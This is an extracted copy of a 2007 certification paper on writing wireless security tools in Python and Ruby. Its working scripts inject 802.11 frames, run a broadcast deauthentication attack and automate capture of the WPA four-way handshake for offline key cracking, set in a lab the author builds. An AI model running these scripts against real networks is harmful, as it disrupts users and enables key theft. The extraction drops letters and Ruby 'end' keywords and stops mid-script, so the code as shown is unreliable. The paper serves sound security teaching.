Programming Wireless Security. GAWN Gold Certification. Author: Robin Wood, Adviser:Joey Neim
|
|
|
- Austin Hodge
- 10 years ago
- Views:
Transcription
1 Programming Wireless Security GAWN Gold Certification Author: Robin Wood, Adviser:Joey Neim Accepted: November 12th 2007 Robin Wood 1
2 Table of Contents 1 Introduction Setting Up The Lab Development/Attacker Machine Network Sniffer Victim Access Point The Tools Hello World Python Ruby Running the Scripts Frame Structure Frame Overview Frame Header The Frame Control Field Beacon Frames...17 Robin Wood 2
3 3.Deauthentication Frames i Authentication Packets and the WPA Handshake A Useful Hello World Python Ruby Comments on the Scripts Running the Scripts Deauthentication Attack Python Ruby Sniffing Wireless Traffic Python Ruby Comments on the Scripts Running the Scripts Automating a Four Way Handshake Capture Python...36 Robin Wood 3
4 2.Ruby Comments on the Scripts Running the Scripts What to do with the collected handshake Summary References...45 Appix A Scapy Issues Scruby Issues...46 Appix B Deauthentication Reason Codes...48 Robin Wood 4
5 1 Introduction This paper is an introduction to some of the programming techniques needed to build wireless security tools. It will go through installing some basic tools then discuss topics including packet injection, sniffing and filtering and give a brief overview of WPA Pre Shared Key and the EAPOL 4 way handshake. All the techniques will be brought together to create an application to automate capturing an EAPOL handshake which can then be used to attempt to crack the Pre Shared Key. Due to the current popularity of both Ruby and Python all the code samples used will be given in both languages. The tools used and created are inted to be used on a Linux system but the concepts discussed are generic. The paper will be distribution indepent with required applications being installed from source rather than using packages, however, if you are able to install the required packages through your distribution it may be easier. If you do this you need to check version numbers and you may need to modify paths or other information. This paper is not designed to teach programming and assumes at least a basic knowledge of programming and wireless terminology. All WPA PSK discussions apply equally to both WPA or WPA2 as they both use the same authentication techniques. Robin Wood 5
6 2 Setting Up The Lab To make building and testing your applications easier you will require the following: 1. Development/Attacker Machine This is the main development machine. It will need Linux and all the tools described in the next section installed. It will need a wireless card which supports monitor mode and packet injection. All work done in this paper is based on an Atheros based wireless card running the madwifi ng version Network Sniffer While not essential this is a useful tool to the check packets you are injecting are being transmitted correctly and to confirm that any packet sniffing your application is doing matches a tried and tested application. Kismet [5] is an ideal choice here. 3. Victim This is any machine which can connect to a WPA network. When in need of a spare machine I found my mobile phone which supports wifi worked well enough. 4. Access Point A standard access point configured with WPA PSK. Ideally all these are separate devices however it is sometimes impractical to have 4 machines so the network sniffer and victim can be the same machine, switching between the two functions as Robin Wood 6
7 necessary. It is also possible to have multiple wireless devices on the same machine. 3 The Tools In this section we will go through installing the tools required for the rest of the paper. Lorcon Lorcon is a tool created by Josh Wright and Mike Kershaw (Dragorn) to simplify packet injection on networks. It supports a large number of wireless cards, a list of which can be found on its homepage To install it, download the latest version from: svn co Then run the standard Linux./configure make make install Next, as root, edit the file /etc/ld.so.conf and check there is a line for /usr/local/lib. If there is not then add it then run ldconfig To check the install worked run ldconfig v grep liborcon If you see a line like this: liborcon so > liborcon.so then the install worked, if not check ld.so.conf again. Robin Wood 7
8 To test Lorcon is properly installed it comes with a test application. To make it run from within the source directory make tx This will build the tx binary which can be ran by./tx This will give you some help text and a list of supported drivers. To actually transmit some packets you can run it like this:./tx i ath0 n 200 c 10 s 10 d madwifing Assuming everything is installed correctly you should get some timing information. If you get any errors but you got the help text from running the binary on its own then Lorcon is at least partially working. In this situation, to get support I suggest joining the Lorcon mailing list [4]. Pylorcon Pylorcon is a python wrapper for Lorcon. The latest version can be downloaded from: Watch out when unpacking the tarball as, at time of writing, it didn't contain a directory structure and so unpacked the files into the current directory. Install instructions can be found in the README file. The package comes with a tx.py test script which emulates the tx program from Lorcon. Scapy Scapy describes itself as a powerful interactive packet Robin Wood 8
9 manipulation program [6]. It can be used to both s and receive data at layer 2 and 3 and can dissect a large number of different protocols. Added to this is the built in ability to perform other tasks such as ARP cache poisoning and port scanning. In this paper I will be covering using Scapy to perform packet filtering and dissection but I encourage readers to learn more about the other aspects of this very flexible tool. Scapy can be downloaded from: The scapy.py file needs to be included in the same directory as your python script to use it. At the time of writing, the current version of Scapy (version 1.1.1) is missing a feature needed towards the of this paper see Appix A for further details. ruby lorcon This is a Ruby wrapper for Lorcon and is distributed with the Metasploit framework, however Metasploit does not need to be installed for the wrapper to work. To install it, download the latest Metasploit from The wrapper can be found in the /external/ruby lorcon directory. It comes with a readme file on how to install it. The wrapper also comes with a test script, test.rb which emulates the tx program from Lorcon. Scruby Scruby is a Ruby port of Scapy. It currently contains a much smaller subset of protocols but is being actively developed with Robin Wood 9
10 protocols being ported from Scapy all the time. As with the Ruby Lorcon wrapper, it is distributed with Metasploit and can be found in the lib/scruby directory. Also, as with Scapy, there are a number of issues which are documented in Appix A. 4 Hello World world. The first application we will build is the standard hello 1. Python #!/usr/bin/env python import sys import pylorcon lorcon = pylorcon.lorcon("ath0", "madwifing") lorcon.setfunctionalmode("inject"); lorcon.setmode("monitor"); lorcon.setchannel(11); print "About to transmit Hello World"; packet = 'Hello World'; for n in range(1000): lorcon.txpacket (packet); print "Done"; The script starts by importing the system and the Lorcon packages and then creates a new instance of the Lorcon class. The two parameters are the wireless interface and the driver. The full list of drivers can be found on the Lorcon homepage [4] but be aware, not all drivers support all features. The next functions setup the card into the correct mode and set Robin Wood 10
11 the channel. A packet is created with the contents Hello World and is then transmitted 1000 times by the txpacket command in the for loop. The large number of transmissions makes it easier to spot the packet in a packet capture. 2. Ruby #!/usr/bin/env ruby require "Lorcon" wifi = Lorcon::Device.new('ath0', 'madwifing') wifi.fmode = "INJECT" wifi.channel= 11 wifi.txrate = 2 wifi.modulation = "DSSS" packet = "Hello World"; 1000.times do wifi.write(packet) puts "Done" The Ruby script works in a similar way to the Python one, it initially imports the Lorcon library then sets up up the card and defines the driver and the interface. The packet is then created and transmitted 1000 times. 3. Running the Scripts Before running the scripts, start up a wireless packet sniffer on your monitor box and lock it to your chosen channel. You are now ready to run your script. Once it has finished close down the sniffer and view the packet capture file created. I recomm using Wireshark ( as it allows you to easily manipulate and dissect packets. Robin Wood 11
12 When viewing this packet capture, a packet dissector will probably claim that all the packets are malformed, however if you look at the actual data captured you should see the packet contains the string hello world. This is because the data we told to the scripts to s was not a valid packet just a piece of text. This highlights an important point, Lorcon will s any data it is told do and does not do any validity checking. This can be both a good and a bad thing deping on what you are trying to achieve. The good side is that it allows you to create packets with any content and so it is easy to create fuzzers and other tools which need to s out non standard data. The bad side is that if you make a mistake when crafting your packet there is nothing to pick it up. This is why I highly recomm using something like Wireshark to monitor all the data you are sing as its protocol analyser allows you to check each individual field in the packet which makes troubleshooting a lot easier Frame Structure This chapter will give an overview of the frame structure, highlighting areas which will be of importance in the upcoming chapters. For this paper we will be interested in 3 specific types of message: Beacon Frame The message sent out from an access point to advertise its presence. Deauthentication Frame This message can be sent by either an access point or a station (client machine) and is used to indicate that the authentication between the two is finished. Robin Wood 12
13 When sent by an access point, the message can either be targeted at a single client or it can be broadcast to deauthenticate all associated clients. The i handshake This will be discussed in more detail later but is the way WPA Pre Shared Key handles authentication. If you are interested in further information about the specification, a good technical reference for the whole standard can be found on the IEEE website [3] Frame Overview The specification defines three types of frames: Management frames used to manage the network, including beacons, probes and authentication. Data The actual data being carried by the network, can be encrypted (WEP or WPA) or unencrypted. Control These frames are used acknowledge the receipt of data packets. All data transmitted on the network should be one of these types. The data will be wrapped in a structure called the frame header which will be discussed in the next section. It is the lack of this frame header which would cause dissectors to report that the Hello World example is corrupt data. 1. Frame Header Each frame contains a standard header as shown in Figure 1. Robin Wood 13
14 Figure 1: Frame Header The header contains all the information needed to get the frame to where it is going and allow the receiver to understand what message the frame is carrying. The first field is the Frame Control (FC) field, this is a bitmap which contains options which specify the layout of the rest of the frame. This field will be discussed in more detail in the next section. Next comes the address fields, the first three fields are mandatory while the fourth is optional and is only used in a Wireless Distribution System (WDS). When not used, this space contains data. The meaning of the address fields varies deping on type of the frame as explained below. The sequence control (SEQ) field is used for fragmentation and packet reassembly. After the header comes the data field which can be of variable length, and finally comes the Frame Check Sequence (FCS). This is a CRC value covering both the header and the body. 2. The Frame Control Field The frame control field is a bitmap field which specifies how the rest of the header is laid out. Its structure is shown in Figure 2. Robin Wood 14
15 Figure 2: Frame Control Field The first field, protocol, is currently always set to 0. The Type and Subtype values are used to specify the type of packet. Type can be one of four values: 00 Management 01 Control 10 Data 11 Reserved/Unused The Subtype then breaks the type down further, some common examples are (type/subtype): 00/0000 Management/Association Request 00/1000 Management/Beacon 00/1011 Management/Authentication 00/1100 Management/Deauthentication 01/1011 Control/Request To S (RTS) 10/0000 Data/Data The From DS and To DS specify the addressing type of the frame as follows: From DS = 0, To DS = 0 Ad hoc or IBSS mode. In this mode the address fields will contain the following: Address 1 The destination Address 2 The source Robin Wood 15
16 Address 3 The BSSID From DS = 1, To DS = 0 Data from the DS, e.g. from the wired network. In this mode the address fields will contain the following: Address 1 The destination address on the wired side Address 2 The BSSID Address 3 The source address of the wireless client From DS = 0, To DS = 1 Data heading to the DS, e.g. From a wireless client to a wired network. In this mode the address fields will contain the following: Address 1 The BSSID Address 2 The source address of the ser on the wireless network Address 3 The destination address of the wired client From DS = 1, To DS = 1 Used in WDS systems to indicate a frame being sent from one AP to another. I have picked out the way that the address fields are used for the frame types we are interested in this paper. The position of these addresses will be important later when we start creating our own frames and sniffing data so we can work out where to s our data to or where captured data is coming from and heading to. As an aside, when the source address and the BSSID are the same, this implies that it is the AP that is talking to the client and vise versa, when the destination and BSSID are the same, a client is talking to the access point. This will be important during deauthentication attacks as it will be the access point which will be Robin Wood 16
17 sing out the frames. The rest of the bits in this field are used to specify power management, fragmentation and to specify whether WEP is in use or not. For more information on these fields, see the reference at the start of this section. 2. Beacon Frames Beacon frames are used by an access point to advertise its presence, its name and its features. They are not mandatory in a wireless network and most access points have an option to turn off beacons. A lot of people believe turning off beacons will hide their network from attacks as their SSID will no longer be broadcast. Unfortunately this isn't the case as the SSID is transmitted in clear text in all management frames so while the network is hidden while there is no data being transmitted, as soon as an attacker can collect a management frame they can find the network SSID. Beacon frames are identified by the type field being set to 0 (Management frame) and a subtype of 8. Figure 3 contains a screenshot taken from Wireshark of a dissected beacon frame. As you can see, the source address and the BSSID are both the same, indicating that the data being sent is from the AP itself and the destination address is ff:ff:ff:ff:ff:ff which indicates the frame is broadcast frame, i.e. for anyone listening. Robin Wood 17
18 Figure 3: Screenshot of a beacon frame in Wireshark We will use beacon frames to test sing data as they are easy to create and easy to detect with either a sniffer or any other machine which is capable of looking for beacons. 3. Deauthentication Frames When a client connects to an encrypted wireless network it must first associate itself then authenticate. The authentication Robin Wood 18
19 process uses either a shared secret or PKI to allow the client to prove they are allowed to use the network. The authentication process is done using authentication frames and the opposite, deauthentication, is done using deauthentication frames. Deauthentication can be done by either an access point or a client and is usually done at the of a session to close it down cleanly and destroy the encryption keys. An access point can also do a broadcast deauthentication which will remove all connected clients. The deauthentication frame is identified by a type 0 (Management) and a subtype of 12 (0xc). The situation we are interested in here is an access point sing the deauthentication so the address fields will be set with: Address 1 Destination client or broadcast (ff:ff:ff:ff:ff:ff) Address 2 The source address, in this case the access point Address 3 The BSSID, again, the address of the access point As part of the deauthentication frame there is a field for the reason for the deauthentication, a list of reason codes is included in Appix B. A screenshot of Wireshark disassembling a deauthentication frame can be seen in Figure 4. Robin Wood 19
20 Figure 4: Screenshot of a deauthentication frame in Wireshark i Authentication Packets and the WPA Handshake We will start with a short overview of WPA. As already mentioned, where the term WPA is used in this paper, the techniques and descriptions used equally apply to WPA2, the only difference between the two versions is in the algorithms used for encryption and message integrity [7]. There are two varieties of WPA, Preshared Key (PSK) and Enterprise. In PSK mode, as the name implies, there is a shared secret which is used by all the clients. The access point is responsible for taking that key and from it creating the various keys needed to encrypt the communication. Enterprise mode allows a much more fine grained approach, giving each client its own secret and moving the responsibility for handling Robin Wood 20
21 the keys from the access point to a separate server, usually a RADIUS server. For more information on WPA Enterprise visit the Wikipedia article [8] or the IEEE specification [9]. The attack we are going to develop here is against WPA PSK and involves capturing what is known as the four way handshake. This is a set of 4 packets which is used to prove both the client and the server know the preshared key and to exchange enough data to set up the keys needed for the session. The following information is based on the IEEE specification [11] and the Wikipedia article [10]. The exchange is shown in Figure 5. Figure 5: The Four Way Handshake Step 1: The AP ss a nonce (single use random value) to the client (STA). Once the client has this value it can use it and the PSK to compute the PTK, it is this value that is used to generate all the keys needed for the session. Robin Wood 21
22 Step 2: The client ss a nonce back to the AP along with a Message Integrity Check (MIC). The AP now has enough information to compute the PTK. Step 3: The AP ss a Group Transient Key (GTK) to the client along with a MIC. The GTK is the broadcast equivalent of the PTK and is transmitted encrypted by the KEK. Step 4: The client finally acknowledges the GTK. The PTK is a 64 byte value which, once computed, is broken down into a number of other keys. In this paper we are not going to look at these keys but just for completeness they are: 16 bytes of EAPOL Key Encryption Key (KEK) 16 bytes of EAPOL Key Confirmation Key (KCK) 16 bytes of Temporal Key (TK) 8 bytes of Michael MIC Authenticator Tx Key 8 bytes of Michael MIC Authenticator Rx Key For more information on i To be able to capture these packets we need to be able to identify them. Because the packet dissector handles the work of defining these packets as EAPOL packets all we need to do is to spot each of the four individual packets we are interested in. We can do this by looking at the values of certain fields and checking which values are set and how they compare to previous packets. Figure 6 shows a screenshot taken from Wireshark in which we can see all the fields needed to identify the packets. The fields we are interested in are three of the single bit flags in the Key Information field (the Key Install flag, the Robin Wood 22
23 Key Ack flag and the Key MIC flag ), the Key Length field and the Replay Counter field. By checking the direction of the packets, access point to client or vise versa, and the settings of these five values we can determine which packets are which. Figure 6: Wireshark dissection of an Authentication packet Packet 1: This is the first packet so will originate from the AP and will have just the Key Ack flag set. Packet 2: The packet is transmitted from the client and has the just the Key MIC flag set. Importantly, it also has a Key Length field greater than 0. Packet 3: The packet is transmitted from the AP to the client and has all three bits set. At this point, we also need to record the value of the Replay Counter. Robin Wood 23
24 Packet 4: The final packet from the client to the AP, only the Key MIC flag is set and the Replay Counter field matches the one recorded in packet 3. Given all this information we can spot these packets as they are transmitted and go on to use them for our attack. 6 A Useful Hello World Now we understand that data must be formatted into packets before it is sent out we are going to write a new Hello World program which ss out Hello World beacons. Robin Wood 24
25 1. Python #!/usr/bin/python import sys import pylorcon wifi = pylorcon.lorcon("ath0", "madwifing") wifi.setfunctionalmode("inject"); wifi.setmode("monitor"); wifi.setchannel(1); essid = "HelloWorld" length_of_essid = chr(len(essid)) destination_addr = '\xff\xff\xff\xff\xff\xff'; source_addr = '\xde\xad\xde\xad\xde\xad'; bss_id_addr = '\x00\x1f\xb8\xff\xe2\x28'; # Type/Subtype 0/8 Management/Beacon packet = '\x80\x00' # flags and duration packet = packet + '\x00\x00'; packet = packet + destination_addr packet = packet + source_addr packet = packet + bss_id_addr # sequence number packet = packet + '\x90\x70'; # fixed params, timestamp, beacon interval, capability interval packet = packet + '\x8a\xd1\xf7\x3c\x00\x00\x00\x00\x64\x00\x11\x04'; # tag number 0 packet = packet + '\x00' + length_of_essid + essid; # tag number 1 packet = packet + '\x01' + '\x08\x82\x84\x8b\x96\x24\x30\x48\x6c' # tag number 3 packet = packet + '\x03' + '\x01\x0b' packet = packet + '\x05\x04\x02\x03\x00\x00' packet = packet + '\x2a\x01\x00' packet = packet + '\x2f\x01\x00' packet = packet + '\x32\x04\x0c\x12\x18\x60' packet = packet + '\xdd\x06\x00\x10\x18\x02\x00\x00'; print "About to transmit HelloWorld beacon"; for n in range(10000): wifi.txpacket (packet); print "Done"; Robin Wood 25
26 2. Ruby #!/usr/bin/env ruby $datastore = Hash.new("Unknown") $datastore["interface"] = "ath0" $datastore["channel"] = 11 $datastore["driver"] = "madwifing" begin require = true rescue ::Exception => = = e if puts ("The Lorcon module is not available: #{@lorcon_error.to_s}") raise RuntimeError, "Lorcon not available" system("ifconfig", $datastore["interface"], "up") wifi = ::Lorcon::Device.new($datastore["INTERFACE"], $datastore["driver"]) wifi.fmode = "INJECT" wifi.channel = 11 wifi.txrate = 2 wifi.modulation = "DSSS" if (not wifi) raise RuntimeError, "Could not open the wireless device interface" destination_addr = "\xff\xff\xff\xff\xff\xff"; source_addr = "\xee\xad\xde\xad\xde\xad"; bss_id_addr = "\x00\x1f\xb8\xff\xe2\x28"; essid = "HelloWorld" Robin Wood 26
27 # Type/Subtype 0/8 Management/Beacon packet = '\x80\x00' # flags and duration packet = packet + '\x00\x00'; packet = packet + destination_addr packet = packet + source_addr packet = packet + bss_id_addr # sequence number packet = packet + '\x90\x70'; # fixed params, timestamp, beacon interval, capability interval packet = packet + '\x8a\xd1\xf7\x3c\x00\x00\x00\x00\x64\x00\x11\x04'; # tag number 0 packet = packet + "\x00" + essid.length.chr + essid # tag number 1 packet = packet + '\x01' + '\x08\x82\x84\x8b\x96\x24\x30\x48\x6c' # tag number 3 packet = packet + '\x03' + '\x01\x0b' packet = packet + '\x05\x04\x02\x03\x00\x00' packet = packet + '\x2a\x01\x00' packet = packet + '\x2f\x01\x00' packet = packet + '\x32\x04\x0c\x12\x18\x60' packet = packet + '\xdd\x06\x00\x10\x18\x02\x00\x00'; puts "About to transmit HelloWorld beacon"; 1000.times do wifi.write(packet) puts "Done" 3. Comments on the Scripts As you can see the scripts are the same as before but this time actual frames are being created. The packets are built up by following the standards described in Section 5.2. I have tried to break the packet down into small sections so you can see how each part relates to the fields described. From this you should be able to see how easy it is to manipulate the packets so you can s out any data you want. This makes it very simple to create fuzzers or generate any kind of fake packet you require. It also makes it very easy to accidentally miss a field or byte so if a script doesn't work correctly do some thorough checking of the values used. Robin Wood 27
28 4. Running the Scripts As before, start a sniffer and run the scripts and you should see the Hello World beacons being transmitted. If you save the packets and open them in Wireshark it should be able to successfully dissect them and you should see the packets displayed match the packets you sent out. 7 Deauthentication Attack A deauthentication attack, also known as a deauth attack, is a way to force clients connected to an access point to remove their stored keys and re authenticate. We are going to use this against an access point using WPA PSK to attempt to collect the four way which can then be used to crack the PSK. This attack can also be used for other purposes such as a denial of service (DOS) attack where you constantly deauthenticate clients so they can't stay connected to the network for long enough to use it. To execute a deauth attack we will need broadcast fake deauthentication packets preting to be the AP. 1. Python #!/usr/bin/env python import sys import pylorcon wifi = pylorcon.lorcon("ath0", "madwifing") wifi.setfunctionalmode("inject"); wifi.setmode("monitor"); wifi.setchannel(11); Robin Wood 28
29 # s the packet to all (broadcast) destination_addr = "\xff\xff\xff\xff\xff\xff"; # the source is the AP so these are the same source_addr = "\x00\x0e\xa6\xce\xe2\x28"; bss_id_addr = "\x00\x0e\xa6\xce\xe2\x28"; # Type/Subtype 0/c0 Management/Deauthentication packet = '\xc0\x00' # flags and duration packet = packet + '\x00\x00' packet = packet + destination_addr packet = packet + source_addr packet = packet + bss_id_addr # fragment number and sequence number packet = packet + '\x00\x00' # Reason code packet = packet + '\x01\x00' puts "Deauth Attack\n" for n in range(100): wifi.txpacket (packet); print "Done"; 2. Ruby #!/usr/bin/env ruby $datastore = Hash.new("Unknown") $datastore["interface"] = "ath0" $datastore["channel"] = 11 $datastore["driver"] = "madwifing" begin require = true rescue ::Exception => = = e if puts ("The Lorcon module is not available: #{@lorcon_error.to_s}") raise RuntimeError, "Lorcon not available" # Force the interface to be up system("ifconfig", $datastore["interface"], "up") Robin Wood 29
30 wifi = ::Lorcon::Device.new($datastore["INTERFACE"], $datastore["driver"]) wifi.fmode = "INJECT" wifi.channel = 11 wifi.txrate = 2 wifi.modulation = "DSSS" if (not wifi) raise RuntimeError, "Could not open the wireless device interface" # s the packet to all (broadcast) destination_addr = "\xff\xff\xff\xff\xff\xff"; # the source is the AP so these are the same source_addr = "\x00\x0e\xa6\xce\xe2\x28"; bss_id_addr = "\x00\x0e\xa6\xce\xe2\x28"; # Type/Subtype 0/c0 Management/Deauthentication packet = '\xc0\x00' # flags and duration packet = packet + '\x00\x00' packet = packet + destination_addr packet = packet + source_addr packet = packet + bss_id_addr # fragment number and sequence number packet = packet + '\x00\x00' # Reason code packet = packet + '\x01\x00' puts "Deauth Attack\n" 100.times do wifi.write(packet) puts Done As you can see, the code is the same as used to s the Hello World beacons except the packet is a deauthentication packet rather than a beacon. To test these scripts they will need to be customised to the test network by setting the source and BSS ID addresses, it is also important to make sure the wireless card is set to the correct channel. Have a client associate with the access point, if using Linux, I use wpa_supplicant in foreground mode as its debug messages help show what is happening. I also start a ping going between the Robin Wood 30
31 client and either the access point or another machine on the network. This helps pick up when there is disturbance in the network. Once all this is in place run the script and you should see the victim become disconnected then reconnect itself after the attack finishes. If you also have a sniffer, have it running during the attack so you can examine the packets after the attack finishes to see if you captured a four way handshake. From experience I have seen that you don't always manage to capture the full four packets, if not, repeat the attack a number of times to confirm you do capture a full four packets. If you are sniffing using Kismet it may show that it has detected a deauthentication attack. 8 Sniffing Wireless Traffic Up to now we have only transmitted data, in this section we will sniff data which we can then filter for useful information. These scripts will sniff the air, capture packets and trigger events in specified situations. To perform sniffing your network card must be in monitor mode. To do this with the madwifi ng drivers you will need to execute the following command: wlanconfig ath create wlandev wifi0 wlanmode monitor For other drivers, the command may be more like this: iwconfig wlan0 mode monitor You also need to make sure the interface is up, this is usually done by: Robin Wood 31
32 ifconfig ath0 up To check whether your card is in monitor mode run the iwconfig command, this will usually specify either Managed mode, which is the default mode for connecting to access points, or Monitor mode. In Managed mode the driver will filter out all traffic not destined for this client. Monitor mode is the same as promiscuous mode in wired networks, the driver accepts all network traffic. Unlike wired networks where switches can filter traffic meaning you have to resort to attacks such as ARP cache poisoning to sniff other peoples data, wireless networks broadcast all traffic to anyone listening leaving it to encryption and device drivers to filter out who has access to what data. As the device drivers are software running on an attackers machine they can easily be manipulated to listen to all traffic, this is what monitor mode does. For our first sniffer we are going to write a very simple one which detects beacon frames. 1. Python #!/usr/bin/env python import sys from scapy import * def sniff_beacon(p): # check to see if it is an frame if not p.haslayer(dot11): return # now check if it is has a beacon layer if not p.haslayer(dot11beacon): return print p.display sniff(iface="ath0", prn=sniff_beacon) Robin Wood 32
33 2. Ruby #!/usr/bin/env ruby require 'scruby' module Scruby def sniff_beacon(pcap, packet) # get the link type linktype = pcap.datalink # dissect the packet based on the link type dec = Scruby.linklayer_dissector(pcap.datalink, packet) # check to see if it is a packet unless (dec.has_layer(dot11)) return # check to see if it is a beacon unless (dec.has_layer(dot11beacon)) return puts dec.to_s scruby = ScrubyBasic.new scruby.sniff(:iface=>"ath0", :prn=>"sniff_beacon") 3. Comments on the Scripts As before, both scripts are very similar except in Ruby you have to do a little bit more to get access to the dissected packet. Both scripts use a callback function to parse each packet as it is sniffed, that function is specified in the arguments to the sniff function towards the of each script. Also in the list of arguments is the interface name to sniff on. The callback function is passed a copy of the packet which has been sniffed. Ruby then needs to run the dissector on it, to do this it gets the data link type then passes this, along with the packet, through the dissector to get the dissected packet. In Python that packet is already available. The function then goes on to use the Robin Wood 33
34 has_layer function to check whether the specified layers exist in the packet, the example is a bit contrived as you could go straight into checking for the beacon but it shows the flexibility of being able to check if the packet is an packet before you go digging deeper into it for further information. 4. Running the Scripts To run the scripts simply execute them. Assuming there is a beaconing access point near by, you should see dissections of the beacon frames being dumped to the screen. These scripts don't contain any channel hopping code so both are sniffing on whatever channel the interface is currently set to. This can be set by the iwconfig command or there are a number of scripts available which handle channel hopping [1]. 9 Automating a Four Way Handshake Capture So far we have learnt how to transmit wireless data, the format that data should take and how to sniff and interpret other people's data. We can now put all this together to create a tool which will attempt to automate the capture of a four way handshake. To save some effort, while the attack is technically against the four way handshake, only the last three frames are actually needed to discover the PSK, because of this, we can ignore the first frame in the set. Robin Wood 34
35 Something to watch for, we can't just stop processing once we have collected one packet of each type, we must make sure that they are all part of the same handshake, i.e. Packet 2 and 3 could be from client X while packet 4 is from client Y. The steps we need to go through are: 1. Deauthenticate all clients on the victim network 2. Sniff the network for packets coming from, or heading to, the target access point 3. For each packet: 4. Workout the address of the client 5. Check if the packet is part of the handshake, if so, flag that that packet has been seen for that client and store it 6. Continue sniffing until a full set of packets for an individual client has been collected, a time out occurs or the sniffer collects a set number of packets 7. If a full set of packets is collected, save them to a file and exit, if not, reset and begin again This process will allow the tool to be left unatted to try to capture the handshake. If the network has no traffic, the deauthentication will not do anything and nothing will be sniffed so the time out will occur and the process restart. If there are clients connected and the deauthentication does cause a number to reauthenticate themselves but we are not able to collect a full set of packets then after the overall packet count exceeds the given amount the process will restart. This is based on the assumption that Robin Wood 35
36 if data is being transmitted and the application hasn't collected a full handshake then it must have missed it. Once a full handshake has been collected then the script exits and stops interfering with the network. 1. Python #!/usr/bin/env python import sys from scapy import * import pylorcon interface = "ath0" #interface = sys.argv[1] eapol_packets = [] handshake_found = 0 injector = pylorcon.lorcon("ath0", "madwifing") injector.setfunctionalmode("inject") injector.setmode("monitor") injector.setchannel(11) destination_addr = '\xff\xff\xff\xff\xff\xff' # i.e. broadcast bss_id_addr = '\x00\x0e\xa6\xce\xe2\x28' source_addr = bss_id_addr # The AP is sing the deauth packet = "\xc0\x00\x3a\x01" packet = packet + destination_addr packet = packet + source_addr packet = packet + bss_id_addr packet = packet + "\x80\xcb\x07\x00"; def deauth(packet_count): for n in range(packet_count): injector.txpacket (packet) Robin Wood 36
37 def sniffeapol(p): if p.haslayer(wpa_key): layer = p.getlayer (WPA_key) if (p.fcfield & 1): # Message come from STA # From DS = 0, To DS = 1 STA = p.addr2 elif (p.fcfield & 2): # Message come from AP # From DS = 1, To DS = 0 STA = p.addr1 else # either ad hoc or WDS return if (not tracking.has_key (STA)): fields = { 'frame2': None, 'frame3': None, 'frame4': None, 'replay_counter': None, 'packets': [] } tracking[sta] = fields key_info = layer.key_info wpa_key_length = layer.wpa_key_length replay_counter = layer.replay_counter WPA_KEY_INFO_INSTALL = 64 WPA_KEY_INFO_ACK = 128 WPA_KEY_INFO_MIC = 256 # check for frame 2 if ((key_info & WPA_KEY_INFO_MIC) and (key_info & WPA_KEY_INFO_ACK == 0) and (key_info & WPA_KEY_INFO_INSTALL == 0) and (wpa_key_length > 0)) : print "Found packet 2 for ", STA tracking[sta]['frame2'] = 1 tracking[sta]['packets'].app (p) # check for frame 3 elif ((key_info & WPA_KEY_INFO_MIC) and (key_info & WPA_KEY_INFO_ACK) and (key_info & WPA_KEY_INFO_INSTALL)): print "Found packet 3 for ", STA tracking[sta]['frame3'] = 1 # store the replay counter for this STA tracking[sta]['replay_counter'] = replay_counter tracking[sta]['packets'].app (p) # check for frame 4 Robin Wood 37
38 elif ((key_info & WPA_KEY_INFO_MIC) and (key_info & WPA_KEY_INFO_ACK == 0) and (key_info & WPA_KEY_INFO_INSTALL == 0) and tracking[sta]['replay_counter'] == replay_counter): print "Found packet 4 for ", STA tracking[sta]['frame4'] = 1 tracking[sta]['packets'].app (p) if (tracking[sta]['frame2'] and tracking[sta]['frame3'] and tracking[sta]['frame4']): print "Handshake Found\n\n" wrpcap ("4way.pcap", tracking[sta]['packets']) handshake_found = 1 sys.exit(0) tracking = {} for i in range(1, 10): print "About to deauth\n\n" deauth(50) print "Deauth done, sniffing for EAPOL traffic" # reset the tracking between each sniffing attempt tracking = {} sniff(iface=interface, prn=sniffeapol, count=1000, timeout=30) print "No handshake found\n\n" 2. Ruby #!/usr/bin/env ruby require 'scruby' $datastore = Hash.new("Unknown") $datastore["interface"] = "ath0" #$datastore["interface"] = "wlan0" $datastore["channel"] = 11 #$datastore["driver"] = "rtl8180" $datastore["driver"] = "madwifing" begin require = true rescue ::Exception => = = e Robin Wood 38
39 if puts ("The Lorcon module is not available: raise RuntimeError, "Lorcon not available" # Force the interface to be up system("ifconfig", $datastore["interface"], "up") wifi = ::Lorcon::Device.new($datastore["INTERFACE"], $datastore["driver"]) wifi.fmode = "INJECT" wifi.channel = 11 wifi.txrate = 2 wifi.modulation = "DSSS" if (not wifi) raise RuntimeError, "Could not open the wireless device interface" destination_addr = "\xff\xff\xff\xff\xff\xff" bss_id_addr = "\x00\x0e\xa6\xce\xe2\x28" source_addr = bss_id_addr packet = '\xc0\x00\x01\x00' packet = packet + destination_addr packet = packet + source_addr packet = packet + bss_id_addr packet = packet + '\x00\x00' packet = packet + '\x80\xcb\x70\x00' def deauth (wifi, packet, packet_count) wifi.write(packet, packet_count, 0) Robin Wood 39
40 module Scruby $tracking = {} def SniffEAPOL(pcap, packet) datalink = pcap.datalink if (datalink == 127) #pp $tracking dissect = Scruby.RadioTap(packet) if (dissect.has_layer(wpa_key)) puts "*****************************" dot11 = dissect.get_layer(dot11).layers_list[0] if ((dot11.fcfield & 1) == 1) sta = dot11.addr2 elsif ((dot11.fcfield & 2) == 2) sta = dot11.addr1 else puts "unknown" return if (not $tracking.has_key?(sta)) fields = { 'frame2' => nil, 'frame3' => nil, 'frame4' => nil, 'replay_counter' => nil, 'packets' => [] } $tracking[sta] = fields wpa_key = dissect.get_layer(wpa_key).layers_list[0] key_info = wpa_key.info wpa_key_length = wpa_key.extralength replay_counter = wpa_key.replaycounter wpa_key_info_install = 64 wpa_key_info_ack = 128 wpa_key_info_mic = 256 # check for frame 2 if (((key_info & wpa_key_info_mic) == wpa_key_info_mic) and ((key_info & wpa_key_info_ack) == 0) and ((key_info & wpa_key_info_install) == 0) and (wpa_key_length.to_i > 0)) : puts "found packet 2 for ", sta + [packet] $tracking[sta]['frame2'] = 1 $tracking[sta]['packets'] = $tracking[sta]['packets'] Robin Wood 40
